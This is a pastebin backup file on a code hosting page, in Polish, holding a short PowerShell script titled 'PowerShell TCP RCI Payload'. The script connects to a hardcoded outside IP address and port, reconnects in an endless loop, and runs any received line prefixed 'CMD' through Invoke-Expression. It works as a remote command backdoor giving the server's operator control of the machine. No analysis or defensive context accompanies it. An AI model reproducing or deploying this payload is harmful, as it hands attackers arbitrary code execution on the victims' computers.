MaciejkaG/maciejkapaste-backup-2023-2024-01
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
30401c735e
maciejkapaste-backup-2023-2.../pastes/paste_816716.txt

39 lines
1.1 KiB
Plaintext
Raw Normal View History

Dodawanie paste'ów
2023-12-31 18:17:29 +01:00
#
# ID: 816716
# Nazwa: PowerShell TCP RCI Payload
# Opis: PowerShell Remote Code Injection client (payload)
# Publiczny: 0
# Data utworzenia/ostatniej edycji (UTC): 2023-11-08 08:13:07
#
$socketHost = "162.19.224.235"
$socketPort = "8880"
while ($true) {
try {
$tcpConnection = New-Object System.Net.Sockets.TcpClient($socketHost, $socketPort)
$tcpStream = $tcpConnection.GetStream()
$reader = New-Object System.IO.StreamReader($tcpStream)
while ($tcpConnection.Connected) {
while ($tcpStream.DataAvailable -or $reader.Peek() -ne -1 ) {
$response = $reader.ReadLine()
$prefix = $response.Split(" ", 2)[0]
if ($prefix -eq "CMD") {
$command = $response.Split(" ", 2)[1]
Invoke-Expression $command
}
}
start-sleep -Milliseconds 500
}
} catch {
Write-Output "Err:`n$_"
}
start-sleep -Milliseconds 5000
}
$reader.Close()
$tcpConnection.Close()
Reference in New Issue Copy Permalink